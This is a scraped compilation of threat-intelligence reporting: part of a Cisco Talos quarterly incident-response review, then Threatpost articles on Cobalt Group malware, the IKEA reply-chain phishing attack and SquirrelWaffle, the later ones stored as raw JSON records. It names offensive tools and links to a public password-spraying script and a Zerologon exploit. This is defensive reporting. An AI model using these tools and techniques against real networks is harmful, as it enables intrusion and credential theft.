builder in their own ransomware operations. 
Talos has already begun tracking one new ransomware group dubbed "BlooDy Gang," which has reportedly used the leaked [LockBit 3.0 builder](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>) in recent ransomware attacks. This could enable even more ransomware groups to save time and resources by relying on leaked builders and source code of other ransomware operations, as opposed to independently developing ransomware.

## Uptick in pre-ransomware behaviors

While ransomware was the top threat this quarter, we also observed an equal number of engagements involving various pre-ransomware behaviors. Although each pre-ransomware engagement involves unique behaviors and TTPs, the overwhelming similarities among these engagements include host enumeration, multiple credential-harvesting activities, and attempts to escalate privileges via an identified weakness or vulnerability in order to move laterally to other systems. In some instances where ransomware was never deployed, the adversary was likely trying to exfiltrate data at the time of detection, indicating they had broad enough access to cause significant harm at that time.

In a pre-ransomware engagement affecting a European energy company, Talos IR observed the installation of Cobalt Strike and Mimikatz. The customer first observed Cobalt Strike installation and/or Mimikatz invocation affecting nearly 100 servers. Talos IR detected traffic associated with Metasploit Framework's Meterpreter shell originating from a compromised host. Seven minutes later, the system attempted to reach out to a confirmed Cobalt Strike C2 server. PowerShell commands and scripts revealed a lightweight Cobalt Strike loader likely associated with Cobalt Strike SMB lateral beaconing.
Other tools observed in the environment include the Active Directory mapping tool SharpHound and Rubeus, a Kerberoasting tool.

## Multiple publicly available tooling and scripts support adversary objectives

We observed adversaries leveraging a variety of publicly available tools and scripts hosted on GitHub repositories or free to download from third-party websites to support operations across multiple stages of the attack lifecycle. To support an adversary's objectives, we commonly observed offensive security and red-team tools, such as the modularized Cobalt Strike framework and the Active Directory reconnaissance tools ADFind and BloodHound. However, the presence of these additional scripts and tools indicates that adversaries are continuing to identify publicly available resources, which adds convenience but muddies attribution.

In a pre-ransomware incident affecting a U.S. manufacturer, the adversary logged in and executed a publicly available [PowerShell script](<https://github.com/dafthack/DomainPasswordSpray>) ("DomainPasswordSpray.ps1") to perform password spraying against the domain. A technique to obtain credentials, password spraying is performed by using a single password, or a list of commonly used passwords, against many different accounts to attempt to validate credentials and gain access. The PowerShell script will result in large numbers of account lockouts, which match the activity reported by the customer. Talos IR also identified the presence of SharpZeroLogon, an exploit for the Zerologon (CVE-2020-1472) privilege escalation vulnerability, which is [publicly available on GitHub](<https://github.com/leitosama/SharpZeroLogon>).
Ultimately, this allows an attacker to take control of a domain controller by resetting the account of the targeted domain controller, potentially leading to a full domain admin compromise.

Talos has been monitoring the increased use of dual-use tools such as [Cobalt Strike](<https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html>), Brute Ratel, Sliver, and Manjusaka. Brute Ratel is of particular concern since the toolkit was [cracked](<https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/>) in late September and is being shared for free across several hacking forums and communities. Additionally, endpoint telemetry revealed an attack chain with Qakbot dropping Brute Ratel. Although we have not yet observed Brute Ratel in any Talos IR engagements, we assess that the tool's rise in the cyber threat landscape in recent months, coinciding with Qakbot operators' use and the cracked version, will likely lead to more threat actors adopting the post-exploitation kit into their operations.

Of note, a majority of the publicly available tooling leveraged this quarter appears focused on accessing and collecting credentials, highlighting the role these tools play in potentially furthering an adversary's objectives.

## Initial vectors

This quarter featured several engagements where attackers leveraged valid accounts to gain initial access, especially in cases where accounts were misconfigured, not disabled properly, or had weak passwords.
In at least two engagements this quarter, Talos IR investigated the possibility of initial adversary access via a compromised contractor's network or a contractor's personal computer.

In nearly 15 percent of engagements this quarter, adversaries identified and/or exploited misconfigured public-facing applications by conducting SQL injection attacks against external websites, exploiting Log4Shell in vulnerable versions of VMware Horizon, and targeting misconfigured and/or publicly exposed servers.

We continued to see [successful Log4Shell (CVE-2021-44228, CVE-2021-45046, and related flaws) exploitation attempts](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) followed by a variety of malicious activities, such as cryptocurrency mining and ransomware. In a Hive ransomware incident affecting a U.S. education institution, Talos IR observed multiple Log4Shell exploitation attempts against a vulnerable VMware Horizon server; the most notable of these attempts resulted in a Cobalt Strike beacon dropped on the server. Talos IR also identified high volumes of cryptocurrency miners, which are common post-exploitation payloads associated with activity targeting the Log4j vulnerabilities. While we could not link the Hive affiliate to the Log4j exploitation attempts, VMware and its respective logs revealed that the server was public-facing, suggesting that more than one adversary may have attempted to target this vulnerability.

The next most common initial infection vector came via email, followed by user execution of a malicious document or link.
In one of the business email compromise (BEC) engagements affecting a U.S. financial services organization, the adversaries used thread hijacking and a malicious email link which led to a fake authentication page that collected user credentials upon entry. The adversary also enabled email inbox rules in an attempt to gain persistence on the compromised email account.

It is important to note that for the majority of incidents, Talos IR could not reasonably determine the initial vector because of logging deficiencies or a lack of visibility into the affected environment.

## Security weaknesses

A lack of MFA remains one of the biggest impediments to enterprise security. Nearly 18 percent of engagements either had no MFA or only had it enabled on a handful of accounts and critical services. Talos IR frequently observes ransomware and phishing incidents that could have been prevented if MFA had been properly enabled on critical services, such as endpoint detection and response (EDR) solutions. Talos IR recommends disabling VPN access for all accounts that are not using two-factor authentication.

In what appears to be a prevalent theme this quarter, in 27 percent of engagements password or account access was not properly configured/disabled, leaving these accounts functionally active and allowing adversaries to use valid credentials to enter the environment. In a few cases, organizations did not properly disable account access after an employee left the organization. Talos IR's recommendation is to disable or delete inactive accounts from Active Directory to prevent suspicious activity.

## Top-observed MITRE ATT&CK techniques

Below is a list of the MITRE ATT&CK techniques observed in this quarter's IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged.
The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.

#### Key findings from the MITRE ATT&CK appendix include:

 * Legitimate remote access software, such as AnyDesk and TeamViewer, was leveraged in nearly a quarter of engagements.
 * In an ongoing trend, adversaries leveraged valid accounts for initial access, especially notable where accounts were misconfigured or had weak passwords.
 * We observed adversaries transferring tools or scripts from external systems or adversary-controlled infrastructure into a compromised environment, referred to as ingress tool transfer. The adversaries frequently downloaded these tools from public sites such as GitHub.
 * We observed adversaries deploying Cobalt Strike and Mimikatz across several pre-ransomware engagements. In cases where ransomware encryption took place, PsExec usage played a large role in executing ransomware in 75 percent of ransomware engagements this quarter.

Tactic | Technique | Example
---|---|---
Initial Access (TA0001) | T1078 Valid Accounts | Adversary leveraged stolen or compromised credentials
Reconnaissance (TA0043) | T1592 Gather Victim Host Information | Text file contains details about host
Persistence (TA0003) | T1136 Create Account | Created a user to add to the local administrators group
Execution (TA0002) | T1059.001 Command and Scripting Interpreter: PowerShell | Executes PowerShell code to retrieve information about the client's Active Directory environment
Discovery (TA0007) | T1482 Domain Trust Discovery | Use various utilities to identify information on domain trusts
Credential Access (TA0006) | T1003 OS Credential Dumping | Deploy Mimikatz and publicly available password lookup utilities
Privilege Escalation (TA0004) | T1068 Exploitation for Privilege Escalation | Exploit ZeroLogon to escalate privileges with a direct path to a compromised domain
Lateral Movement (TA0008) | T1021.001 Remote Desktop Protocol | Adversary made attempts to move laterally using Windows Remote Desktop
Defense Evasion (TA0005) | T1027 Obfuscated Files or Information | Use base64-encoded PowerShell scripts
Command and Control (TA0011) | T1105 Ingress Tool Transfer | Adversaries transfer/download tools from an external system
Impact (TA0040) | T1486 Data Encrypted for Impact | Deploy Hive ransomware and encrypt critical systems
Exfiltration (TA0010) | T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage | Actor exfiltrated data to file sharing site mega[.]nz
Collection (TA0009) | T1074 Data Staged | Stage data in separate output files
Software/Tool | S0002 Mimikatz | Use Mimikatz to obtain account logins and passwords

Source: "Quarterly Report: Incident Response Trends in Q3 2022," Cisco Talos blog, published 2022-10-25, http://blog.talosintelligence.com/2022/10/quarterly-report-incident-response.html (CVEs referenced: CVE-2020-1472, CVE-2021-44228, CVE-2021-45046).

Despite the high-profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior.
In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.

In a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments, including:

 * Despite the arrest earlier this year of a key member, the Cobalt Group remains active.
 * A new version of the malware ThreadKit was being actively distributed in October 2018.
 * The CobInt trojan uses an XOR-based obfuscation technique.

## Reemergence of Cobalt Group

The Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In a single campaign, it was credited with stealing over $32,000 from six Eastern European ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.

In March, the Cobalt Group was dealt a severe blow when Europol [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the "criminal mastermind" behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technologies](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear-phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.

"In 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America.
Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. 
\u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan CobInt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, an XOR routine used to decode the initial CobInt payload. An XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members has only temporarily slowed Carbanak/Cobalt threat actors. 
In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T15:47:49", "description": "As of Friday \u2013 as in, shopping-on-steroids Black Friday \u2013 retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.\n\n[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails \u2013 one of which is replicated below \u2013 that warned employees of the attack, which was targeting the company\u2019s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company\u2019s suppliers and partners.\n\n> \u201cThere is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.\n> \n> \u201cThis means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. 
It is therefore difficult to detect, for which we ask you to be extra cautious.\u201d \u2013IKEA internal email to employees.\n\nAs of Tuesday morning, the company hadn\u2019t seen any evidence of its customers\u2019 data, or business partners\u2019 data, having been compromised. \u201cWe continue to monitor to ensure that our internal defence mechanisms are sufficient,\u201d the spokesperson said, adding that \u201cActions have been taken to prevent damages\u201d and that \u201ca full-scale investigation is ongoing.\u201d____\n\nThe spokesperson said that the company\u2019s \u201chighest priority\u201d is that \u201cIKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.\u201d\n\nIKEA didn\u2019t respond to Threatpost\u2019s queries about whether the attack has been contained or if it\u2019s still ongoing.\n\n## Example Phishing Email\n\nIKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company\u2019s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits. Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)\n\nExample phishing email sent to IKEA employees. Source: BleepingComputer.\n\n## Exchange Server Attacks D\u00e9j\u00e0 Vu?\n\nThe attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. 
The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAs security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\nWhat was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. 
The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\nTrend Micro\u2019s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.\n\nTheir conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).\n\nIn the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose \u201cEnable Content\u201d to view a protected file, thus launching the infection chain.\n\nSince IKEA 
hasn\u2019t responded to media inquiries, it\u2019s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to \u201cEnable Content\u201d or \u201cEnable Editing\u201d to view it.\n\nTrend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\n## You Can\u2019t Trust Email from \u2018Someone You Know\u2019\n\nIt\u2019s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads. Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren\u2019t necessarily legitimate and can be downright malicious.\n\n\u201cIf you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,\u201d she told Threatpost via email on Monday. \u201cHowever, IKEA employees are finding out otherwise. 
They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.\u201d\n\nThis attack is \u201cparticularly insidious,\u201d she commented, in that it \u201cseemingly continues a pattern of normal use.\u201d\n\n## No More Ignoring Quarantine\n\nWith such \u201cnormal use\u201d patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.\n\nThus, IKEA\u2019s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:\n\n> \u201cOur email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it\u2019s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.\u201d \u2013IKEA internal email to employees.\n\n## Is Training a Waste of Time?\n\nWith such sneaky attacks as these, is training pointless? 
Some say yes, some say no.\n\nErich Kron, security awareness advocate at [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkwmuP_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r2sgW-2Be451MnVYlMzEVQ43u-2Fx2JCoSpeITOcIPo6Gi3VBNSVcUaapZzArkSDh5SZ2Cih-2F-2FVdRBgHXCsqyWXs7po0-2FS83TsiYRB3U8HOgtt0HT6BGdSMjxi-2FVc6P1ZgVny6ZGKAKxbHvydLCfU5zrtFQ-3D>), is pro-training, particularly given how damaging these attacks can be.\n\n\u201cCompromised email accounts, especially those from internal email systems with access to an organization\u2019s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,\u201d he told Threatpost via email on Monday. \u201cBecause it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.\n\n\u201cThese sorts of attacks, especially if the attackers can gain access to an executive\u2019s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,\u201d Kron said.\n\nHe suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message. 
\u201cIf it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,\u201d he said.\u201d\n\nIn contrast, Christian Espinosa, managing director of [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PeL3x_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r8Wex0T7OFTT8vFIbMA9T-2BlDgGhDFXEelC-2FWPjZXKe9NWtbBbYafHTvkVre5k1vKi3GgofOJKSR-2F2xlpyW7kQklpPEA59unEm4rAKnCodaK-2FrXGwLA5yk9gY1MBMzuyaJeG4mVY1yL-2F3YI1d-2BMmcWiY-3D>), is a firm vote for the \u201ctraining is pointless\u201d approach.\n\n\u201cIt should be evident by now that awareness and phishing training is ineffective,\u201d he told Threatpost via email on Monday. \u201cIt\u2019s time we accept \u2018users\u2019 will continuously fall for phishing scams, despite how much \u2018awareness training\u2019 we put them through.\u201d\n\nBut what options do we have? Espinosa suggested that cybersecurity defense playbooks \u201cshould focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the \u2018malware\u2019 would not be whitelisted.\u201d\n\nHe pointed to other industries that have compensated for human factors, such as transportation. \u201cDespite awareness campaigns, the transportation industry realized that many people did not \u2018look\u2019 before turning across traffic at a green light,\u201d Espinosa said. \u201cInstead of blaming the drivers, the industry changed the traffic lights. 
The newer lights prevent drivers from turning across traffic unless there is a green arrow.\u201d\n\nThis change saved thousands of lives, he said, and it\u2019s high time that the cybersecurity industry similarly \u201ctakes ownership.\u201d\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T21:22:12", 
"type": "threatpost", "title": "IKEA Hit by Email Reply-Chain Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-29T21:22:12", "id": "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "href": "https://threatpost.com/ikea-email-reply-chain-attack/176625/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-23T00:36:02", "description": "Attackers are gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads, researchers say.\n\nWhat\u2019s still under discussion: whether the offensive is delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle is just one piece of malware among several that the campaigns are dropping.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt 
Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\n## Slipping Under People\u2019s Noses\n\nIn a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) posted on Friday, Trend Micro researchers \u200b\u200bMohamed Fahmy, Sherif Magdy and Abdelrhman Sharshar said that hijacking email replies for malspam is a good way to slip past both people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\n\u201cDelivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail [gateways] will not be able to filter or quarantine any of these internal emails,\u201d they wrote.\n\nThe attacker also didn\u2019t drop, or use, tools for lateral movement after gaining access to the vulnerable Exchange servers, Trend Micro said. Thus, they left no tracks, as \u201cno suspicious network activities will be detected. 
Additionally, no malware was executed on the Exchange servers that will trigger any alerts before the malicious email is spread across the environment.\u201d\n\n## Middle East Campaign\n\nTrend Micro\u2019s Incident Response team had decided to look into what researchers believe are SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious Exchange server vulnerabilities.\n\nThey shared a screen capture, shown below, that\u2019s representative of the malicious email replies that showed up in all of the user inboxes of one affected network, all sent as legitimate replies to existing threads, all written in English.\n\nThey found that other languages were used in different regions outside of the Middle East attack they examined. Still, in the intrusions they analyzed that were outside of the Middle East, most of the malicious emails were written in English, according to the report.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22101946/malicious-spam-received-by-targets-e1637594408162.png>)\n\nMalicious spam received by targets. Source: Trend Micro.\n\n\u201cWith this, the attackers would be able to hijack legitimate email chains and send their malicious spam as replies to the said chains,\u201d the researchers wrote.\n\n## Who\u2019s Behind This?\n\n[Cryptolaemus](<https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/>) researcher [TheAnalyst](<https://twitter.com/ffforward>) disagreed with Trend Micro on its premise that SquirrelWaffle is actually acting as a malware dropper for Qbot or other malwares. Rather, TheAnalyst asserted on Friday that the threat actor is dropping both SquirrelWaffle and Qbot as [discrete payloads](<https://twitter.com/ffforward/status/1461810466720825352>), and the most recent [confirmed SquirrelWaffle drop](<https://twitter.com/ffforward/status/1461810488870944768>) it has seen was actually on Oct. 
